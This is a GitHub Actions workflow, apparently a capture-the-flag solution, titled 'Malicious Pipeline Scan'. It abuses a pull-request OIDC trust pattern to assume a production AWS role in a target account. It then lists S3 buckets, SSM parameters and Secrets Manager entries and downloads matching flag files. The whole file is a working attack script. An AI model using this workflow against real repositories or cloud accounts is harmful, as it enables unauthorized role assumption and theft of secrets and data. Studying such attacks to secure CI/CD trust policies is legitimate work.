name: Malicious Pipeline Scan
on:
  pull_request:  # Required for refs/pull* pattern exploit
    branches: 
      - main

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    
    steps:
    - name: Checkout
      uses: actions/checkout@v4
      
    - name: Exploit AWS Role
      uses: aws-actions/configure-aws-credentials@v4
      with:
        aws-region: us-east-1
        role-to-assume: arn:aws:iam::TARGET-ACCOUNT-ID:role/warden-production
        
    - name: Hunt for Flags
      run: |
        echo "=== AWS Identity ==="
        aws sts get-caller-identity
        
        echo "=== S3 Buckets ==="
        aws s3 ls
        
        echo "=== Searching for flags ==="
        # Check S3 buckets for flags
        for bucket in $(aws s3 ls | awk '{print $3}'); do
          echo "Checking bucket: $bucket"
          aws s3 ls s3://$bucket --recursive | grep -i flag || true
          aws s3 cp s3://$bucket/ . --recursive --exclude "*" --include "*flag*" || true
        done
        
        # Check Systems Manager
        aws ssm describe-parameters | grep -i flag || true
        
        # Check Secrets Manager
        aws secretsmanager list-secrets | grep -i flag || true
        
        # List all files in current directory
        find . -name "*flag*" -type f | head -10
